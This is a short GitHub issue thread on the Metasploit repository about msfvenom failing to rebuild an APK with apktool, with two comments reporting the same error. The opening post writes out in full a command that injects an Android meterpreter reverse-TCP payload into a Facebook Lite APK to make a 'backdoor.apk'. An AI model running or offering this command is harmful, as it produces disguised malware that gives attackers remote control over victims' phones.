### ISSUE TITLE
msfvenom: Error: Unable to rebuild apk with apktool

### ISSUE THREAD

**Issue by ghost** [rapid7/metasploit-framework#13606]
**msfvenom -x facebook_lite.apk -p android/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX -o backdoor.apk**

I get such an error when trying to combine apk with backdoor

![Screenshot from 2020-06-12 11-58-21](https://user-images.githubusercontent.com/65988898/84500479-25fa5c00-aca4-11ea-88f1-4b5862388c3e.png)

**Comment by arya-king** [comment]
I also got the same error , apktool is unable to rebulid the app
![2](https://user-images.githubusercontent.com/66529389/84736537-ad590f80-afc3-11ea-8c6c-4d6d129062ef.JPG)

**Comment by arya-king** [comment]
I hope someone will solve this issue soon
thank u
